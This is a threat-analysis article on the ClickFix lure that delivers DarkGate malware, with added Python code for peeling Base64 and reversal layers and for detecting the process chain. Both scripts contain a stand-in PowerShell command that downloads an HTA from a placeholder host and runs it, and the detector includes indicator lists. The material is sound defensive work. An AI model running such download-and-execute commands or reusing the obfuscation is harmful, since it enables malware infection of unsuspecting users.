ClickFix Disguises a Fake Word Online Message to Lure Victims into DarkGate Infection
Unlike malware that installs itself through an exploit or a dropper, ClickFix relies on the victim: a deceptive, support-style prompt talks the user into running a command themselves, and that command leads directly to a DarkGate infection.
The attack begins when users encounter a fake browser alert claiming that the “Word Online” extension is not installed.
A pop-up prompts them to click a “How to fix” button, supposedly to restore functionality. Behind this seemingly harmless message lies a malicious script embedded in the webpage’s HTML code.
Upon inspection, analysts found the PowerShell command hidden under multiple layers of Base64 encoding and string reversal. Once decoded, the command downloads an HTA (HTML Application) file from a remote server.
The downloaded file is written to C:\Users\Public\nC.hta and launched with Start-Process, which hands the .hta file to its registered handler, mshta.exe, and starts the infection chain.
The script then clears the clipboard (Set-Clipboard -Value " ") and terminates its own session (exit), so that the pasted command is no longer recoverable from the clipboard and the console window disappears before the user can read it.
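The Base64-and-reverse layering described above can be peeled mechanically. The following Python is an added example written for this page; it is not the researchers' tooling and does not contain the real ClickFix payload. The inner command, the URL (example.invalid) and the file path are constructed stand-ins, and the peeler also handles the UTF-16LE form that PowerShell's -EncodedCommand uses.

```python
import base64
import re

# Constructed stand-in for the decoded command (NOT the real ClickFix payload):
# download an HTA to a user-writable path and run it.
INNER_COMMAND = ('powershell -w hidden -c "iwr http://example.invalid/dark.hta '
                 '-OutFile C:\\Users\\Public\\nC.hta; Start-Process C:\\Users\\Public\\nC.hta"')

# Tokens that tell us we have reached the plaintext command.
MARKERS = ("powershell", "start-process", "invoke-webrequest", "iwr ", "mshta", ".hta")


def obfuscate(cmd, rounds=2):
    """Build a sample blob the way the page describes: reverse, then Base64, repeated."""
    s = cmd
    for _ in range(rounds):
        s = base64.b64encode(s[::-1].encode()).decode()
    return s


def looks_like_command(s):
    low = s.lower()
    return any(m in low for m in MARKERS)


def is_text(s):
    """Printable and overwhelmingly ASCII; rejects random bytes that happen to decode."""
    if not s or not all(c.isprintable() or c in "\r\n\t" for c in s):
        return False
    return sum(c.isascii() for c in s) / len(s) >= 0.9


def try_base64(s):
    """Return the decoded text if s is valid Base64 of UTF-8 or UTF-16LE text, else None."""
    s = s.strip()
    if len(s) % 4 or not re.fullmatch(r"[A-Za-z0-9+/=]+", s):
        return None
    try:
        raw = base64.b64decode(s, validate=True)   # rejects padding in the wrong place
    except ValueError:
        return None
    for enc in ("utf-8", "utf-16-le"):           # utf-16-le covers -EncodedCommand
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if is_text(text):
            return text
    return None


def peel(blob, max_layers=10):
    """Strip Base64 and reversal layers until a recognisable command appears.

    Returns (command, layers) where layers lists the transforms undone,
    outermost first; command is None if nothing recognisable was found.
    """
    layers = []
    cur = blob
    for _ in range(max_layers):
        if looks_like_command(cur):
            return cur, layers
        decoded = try_base64(cur)
        if decoded is not None:
            layers.append("base64")
            cur = decoded
            continue
        rev = cur[::-1]
        if looks_like_command(rev) or try_base64(rev) is not None:
            layers.append("reverse")
            cur = rev
            continue
        break
    return None, layers


if __name__ == "__main__":
    blob = obfuscate(INNER_COMMAND)
    cmd, layers = peel(blob)
    print("layers removed:", " -> ".join(layers))
    print("recovered:", cmd)
```

The peeler decides between the two transforms by checking which one yields something decodable, so it does not need to know the layer order in advance; the same loop also recovers a plain -EncodedCommand argument because try_base64 accepts UTF-16LE text.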
A JavaScript segment embedded in the same HTML page drives the user interface and the clipboard. When the victim clicks the “How to fix” button, the script writes the malicious PowerShell command to the clipboard.
The victim is then instructed to press Windows + R to open the Run dialog and paste (CTRL + V) what was copied. Because nothing is executed until the user presses Enter, the command runs with the victim's own privileges in the victim's own interactive session.
This user-driven execution downloads and launches dark.hta, which connects to a command-and-control (C2) server and retrieves additional scripts.
It creates directories on the C: drive, drops a compiled AutoIt script (.a3x), and executes it automatically to deploy further payloads. A .a3x file only runs through the AutoIt3 interpreter, so the loader must also supply or locate AutoIt3.exe on the host.
Analysis of the fckhffh.a3x file indicates the use of the DES algorithm, followed by the writing of a second executable, believed to start DarkGate's core operations and data exfiltration routines.
Security telemetry links this activity to the following MITRE ATT&CK techniques:
Researchers warn that ClickFix evades detection because the user manually initiates the malicious command: the first stage is not a dropped malware file for antivirus to scan, but signed, built-in Windows tools (powershell.exe and mshta.exe) started from the user's own interactive session, so the resulting process tree (explorer.exe spawning powershell.exe, which in turn spawns mshta.exe) resembles an administrator's own actions.
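Although the user-initiated launch looks ordinary to file-based antivirus, the process chain is distinctive. The following Python is an added example for this page (not the researchers' detection content) that runs three rules over constructed process-creation events shaped like Sysmon Event ID 1 fields; the paths, command lines and the example.invalid URL are invented for the demonstration.

```python
import re

# Constructed events in the shape of Sysmon Event ID 1 (process creation).
# These are illustrative, not telemetry from the reported campaign.
EVENTS = [
    {"id": 1, "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": ('powershell -w hidden -c "iwr http://example.invalid/dark.hta '
                 '-OutFile C:\\Users\\Public\\nC.hta; Start-Process C:\\Users\\Public\\nC.hta; '
                 "Set-Clipboard -Value ' '; exit\"")},
    {"id": 2, "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe C:\\Users\\Public\\nC.hta"},
    {"id": 3, "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Users\\Public\\AutoIt3.exe",
     "cmdline": "AutoIt3.exe C:\\Users\\Public\\fckhffh.a3x"},
    # Benign: an admin running a one-liner from the Run dialog.
    {"id": 4, "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Process"},
    # Benign: vendor help file launched from Program Files.
    {"id": 5, "parent": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe C:\\Program Files\\Vendor\\help.hta"},
]

# Directories an unprivileged user can write to; HTAs run from here are suspect.
USER_WRITABLE = (r"c:\users\public", r"c:\programdata", r"\appdata\local\temp", r"c:\windows\temp")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_run_dialog_powershell(ev):
    """Win+R paste pattern: explorer.exe parent, PowerShell child, download-and-run indicators."""
    if basename(ev["parent"]) != "explorer.exe" or basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    cl = ev["cmdline"].lower()
    indicators = ("start-process", "invoke-webrequest", "iwr ", "downloadstring", ".hta",
                  "mshta", "-enc", "-w hidden", "-windowstyle hidden", "set-clipboard")
    hits = [i for i in indicators if i in cl]
    if len(hits) >= 2:      # one indicator alone is common in legitimate admin use
        return "explorer.exe -> powershell.exe with download/execute indicators: " + ", ".join(hits)
    return None


def rule_mshta_from_user_writable(ev):
    """mshta.exe executing an HTA that lives in a user-writable directory."""
    if basename(ev["image"]) != "mshta.exe":
        return None
    if any(d in ev["cmdline"].lower() for d in USER_WRITABLE):
        return "mshta.exe launching an HTA from a user-writable directory"
    return None


def rule_autoit_script(ev):
    """AutoIt interpreter running a compiled .a3x script, as in the DarkGate stage."""
    if basename(ev["image"]).startswith("autoit3") or re.search(r"\.a3x\b", ev["cmdline"].lower()):
        return "AutoIt interpreter executing a compiled .a3x script"
    return None


RULES = (rule_run_dialog_powershell, rule_mshta_from_user_writable, rule_autoit_script)


def scan(events):
    """Return (event id, rule name, reason) for every rule that fires."""
    alerts = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                alerts.append((ev["id"], rule.__name__, reason))
    return alerts


if __name__ == "__main__":
    for event_id, rule_name, reason in scan(EVENTS):
        print(f"event {event_id}: {rule_name}: {reason}")
```

The first rule deliberately requires two indicators so that an administrator's own Run-dialog one-liner (event 4) stays quiet, while the pasted ClickFix command (event 1) trips several at once; in production the same logic maps onto a SIEM query over parent image, image and command line.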
To stay protected, users should never paste commands copied from pop-ups or websites offering a quick “fix.” Enterprises can reduce risk by disabling the Windows Run dialog via Group Policy, but that is only a speed bump: the same text can be pasted into a PowerShell window, Windows Terminal, the File Explorer address bar or Start menu search. Stronger controls are an application allowlist (AppLocker or WDAC) that blocks mshta.exe and unapproved interpreters such as AutoIt3.exe, PowerShell script block logging, and alerting on explorer.exe spawning powershell.exe with a download-and-execute command line.
The post ClickFix Disguises a Fake Word Online Message to Lure Victims into DarkGate Infection appeared first on Cyber Security News.